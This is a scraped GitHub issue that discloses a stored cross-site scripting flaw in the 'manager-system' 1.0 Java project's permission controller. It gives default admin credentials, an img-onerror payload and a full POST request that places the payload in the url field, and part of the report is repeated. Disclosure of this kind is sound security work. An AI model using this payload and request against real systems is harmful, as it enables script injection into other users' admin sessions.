You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Code Audit:
The submitAddPermission method in src/main/java/com/zero/system/controller/PermissionController. java does not filter the passed URL parameter
Vulnerability exploitation: http://localhost:8080/manager/login
superadmin/123
Click to modify
Input:<img src=x onerror=alert(1);>
Click to modify now
Corresponding data packet:
POST /manager/addPermission HTTP/1.1
Host: 192.168.0.102:8080
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1CEE536BC9A3066C37AB43E0F2E59A30
Connection: close
Content-Length: 80
id=6&name=%E5%90%8E%E5%8F%B0%E4%B8%BB%E9%A1%B5&url=<img src=x onerror=alert(1);>
The text was updated successfully, but these errors were encountered:
Source code name:manager-system
Source code version:1.0
Source code download link:https://github.com/ZeroWdd/manager-system/archive/refs/heads/master.zip
Code Audit:
The submitAddPermission method in src/main/java/com/zero/system/controller/PermissionController. java does not filter the passed URL parameter
Vulnerability exploitation:
http://localhost:8080/manager/login
superadmin/123
Click to modify
Input:
<img src=x onerror=alert(1);>Click to modify now
Corresponding data packet:
The text was updated successfully, but these errors were encountered: